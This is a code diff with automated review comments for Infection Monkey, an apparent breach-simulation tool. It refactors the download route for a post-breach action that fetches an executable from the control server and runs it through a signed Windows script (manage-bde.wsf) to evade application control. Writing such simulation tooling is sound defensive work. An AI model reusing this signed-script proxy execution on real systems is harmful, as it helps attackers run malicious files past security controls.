diff --git a/monkey/common/data/api_url_consts.py b/monkey/common/data/api_url_consts.py new file mode 100644 index 000000000..4fef6b11b --- /dev/null +++ b/monkey/common/data/api_url_consts.py @@ -0,0 +1 @@ +T1216_PBA_FILE_DOWNLOAD_PATH = '/api/t1216-pba/download' diff --git a/monkey/infection_monkey/control.py b/monkey/infection_monkey/control.py index 22856ee3c..35922286f 100644 --- a/monkey/infection_monkey/control.py +++ b/monkey/infection_monkey/control.py @@ -2,12 +2,14 @@ import json import logging import platform from socket import gethostname +from urllib.parse import urljoin import requests from requests.exceptions import ConnectionError import infection_monkey.monkeyfs as monkeyfs import infection_monkey.tunnel as tunnel +from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH from infection_monkey.config import GUID, WormConfiguration from infection_monkey.network.info import check_internet_access, local_ips from infection_monkey.transport.http import HTTPConnectProxy @@ -328,7 +330,8 @@ class ControlClient(object): @staticmethod def get_T1216_pba_file(): try: - return requests.get("https://%s/api/t1216-pba/download/" % WormConfiguration.current_server, # noqa: DUO123 + return requests.get(urljoin(f"https://{WormConfiguration.current_server}/", # noqa: DUO123 + T1216_PBA_FILE_DOWNLOAD_PATH), verify=False, proxies=ControlClient.proxies, stream=True) diff --git a/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py b/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py index 73a3a8559..17eb86337 100644 --- a/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py +++ b/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py @@ -1,3 +1,4 @@ +import logging import subprocess from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC 
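Review bot: The new constant `T1216_PBA_FILE_DOWNLOAD_PATH` carries no comment, yet it is now the single value both the agent (`control.py`) and the island's route registration (`app.py`) depend on, and it deliberately drops the trailing slash that the old literals on both sides had. A one-line comment would keep a future edit on one side from silently breaking the other: `# Island route and agent download URL for the T1216 PBA file; agent and island must agree on this exact path (no trailing slash).`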
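Review bot: `urljoin` adds nothing in `get_T1216_pba_file`, because `T1216_PBA_FILE_DOWNLOAD_PATH` is an absolute path and the base is only scheme and host, so the result is the plain concatenation; `f"https://{WormConfiguration.current_server}{T1216_PBA_FILE_DOWNLOAD_PATH}"` expresses the same without the new import and the two-line call. The `try:` body continues into an `except` branch outside the hunk, so what the caller receives when the request fails is not visible here; a docstring such as `"""Fetch the T1216 PBA executable from the island as a streamed response; see the except branch for the failure value."""` would help the caller in signed_script_proxy.py, which reads `.content` directly.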
@@ -6,6 +7,8 @@ from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import cleanup_changes, get_commands_to_proxy_execution_using_signed_script) from infection_monkey.utils.environment import is_windows_os +LOG = logging.getLogger(__name__) + class SignedScriptProxyExecution(PBA): def __init__(self): @@ -14,11 +17,14 @@ class SignedScriptProxyExecution(PBA): windows_cmd=' '.join(windows_cmds)) def run(self): - original_comspec = '' - if is_windows_os(): - original_comspec =\ - subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116 + try: + original_comspec = '' + if is_windows_os(): + original_comspec =\ + subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116 - super().run() - - cleanup_changes(original_comspec) + super().run() + except Exception as e: + LOG.warning(f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}") + finally: + cleanup_changes(original_comspec) diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py index 1e06f453e..6cdf5fe01 100644 --- a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py +++ b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py @@ -1,5 +1,4 @@ import os -import subprocess from infection_monkey.control import ControlClient 
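Review bot: The new `except Exception as e:` in `run()` logs only `str(e)` through an eagerly formatted f-string, so the traceback of whatever failed inside `super().run()` or the COMSPEC lookup is lost; `LOG.exception("An exception occurred on running PBA %s", POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC)` records the stack and defers formatting. Catching `Exception` here also means a failed PBA no longer propagates; if the base class's `run()` is what reports the result to the island (not visible in this diff), the failure is then only visible in the agent log, which is worth stating in a comment next to the handler. The `finally:` correctly keeps `cleanup_changes(original_comspec)` on every path, since `original_comspec = ''` is the first statement inside the `try`.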
@@ -8,11 +7,11 @@ TEMP_COMSPEC = os.path.join(os.getcwd(), 'random_executable.exe') def get_windows_commands_to_proxy_execution_using_signed_script(): download = ControlClient.get_T1216_pba_file() - with open(TEMP_COMSPEC, 'wb') as file_obj: - file_obj.write(download.content) - file_obj.flush() + with open(TEMP_COMSPEC, 'wb') as random_exe_obj: + random_exe_obj.write(download.content) + random_exe_obj.flush() - windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n') # noqa: DUO116 + windir_path = os.environ['WINDIR'] signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf') return [ diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index 31b534b3a..e8dfd2cfc 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py @@ -6,6 +6,7 @@ from flask import Flask, Response, send_from_directory from werkzeug.exceptions import NotFound import monkey_island.cc.environment.environment_singleton as env_singleton +from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH from monkey_island.cc.database import database, mongo from monkey_island.cc.resources.attack.attack_config import AttackConfiguration @@ -132,7 +133,7 @@ def init_api_resources(api): api.add_resource(Log, '/api/log', '/api/log/') api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/') api.add_resource(PBAFileDownload, '/api/pba/download/') - api.add_resource(T1216PBAFileDownload, '/api/t1216-pba/download/') + api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH) api.add_resource(FileUpload, '/api/fileUpload/', '/api/fileUpload/?load=', '/api/fileUpload/?restore=') diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py index 92c09352f..d4efbd73e 100644 
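Review bot: `download.content` is written to `TEMP_COMSPEC` without checking the response, so a non-2xx reply from the island (for example the 404 produced if the route and the constant ever disagree) would be saved as the executable that, judging by the `TEMP_COMSPEC` name and the COMSPEC handling in use_signed_scripts.py, is meant to be run; add `download.raise_for_status()` before the `with open(...)`. `ControlClient.get_T1216_pba_file()` wraps its request in a `try` whose `except` branch is outside this diff, so also confirm it cannot return `None` here, which would surface as an `AttributeError` on `.content`. `os.environ['WINDIR']` raises `KeyError` when the variable is unset; since `run()` now catches `Exception` that is logged rather than fatal, but `os.environ.get('WINDIR')` followed by an explicit error would make the log entry self-explanatory. The function's return list continues outside the hunk.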
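Review bot: `api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH)` registers only the slash-less form, whereas the removed line registered only `'/api/t1216-pba/download/'` and the neighbouring `Log` and `IslandLog` resources register both forms; with Flask's default strict-slash matching, a request for the old trailing-slash URL now gets a 404 rather than a redirect. An agent built from the previous revision still uses the old literal, so either register both, `api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH, T1216_PBA_FILE_DOWNLOAD_PATH + '/')`, or document next to the constant that older agents are no longer served by this route.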
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py @@ -8,8 +8,14 @@ __author__ = "shreyamalviya" class T1216(PostBreachTechnique): tech_id = "T1216" unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\ - "pre-existing signed script since it didn't run on any Windows machines." + "pre-existing signed script since it didn't run on any Windows machines. " +\ + "If successful, this behavior could be abused by adversaries to execute malicious files that could " +\ + "bypass application control and signature validation on systems." scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\ - "pre-existing signed script on Windows but failed." - used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows." + "pre-existing signed script on Windows but failed. " +\ + "If successful, this behavior could be abused by adversaries to execute malicious files that could " +\ + "bypass application control and signature validation on systems." + used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows. " +\ + "This behavior could be abused by adversaries to execute malicious files that could " +\ + "bypass application control and signature validation on systems." pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]
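Review bot: The extended `unscanned_msg`, `scanned_msg` and `used_msg` literals keep building the text with `+\` line continuations, which break on any trailing whitespace after the backslash and cost a runtime concatenation per piece; parenthesised adjacent string literals, e.g. `unscanned_msg = ("Monkey didn't attempt ... " "If successful, ... " "bypass ... on systems.")`, are joined at compile time and need no backslashes. The three messages also repeat the same "could be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems." sentence verbatim; a module-level constant for it would keep the three in sync the next time the wording changes.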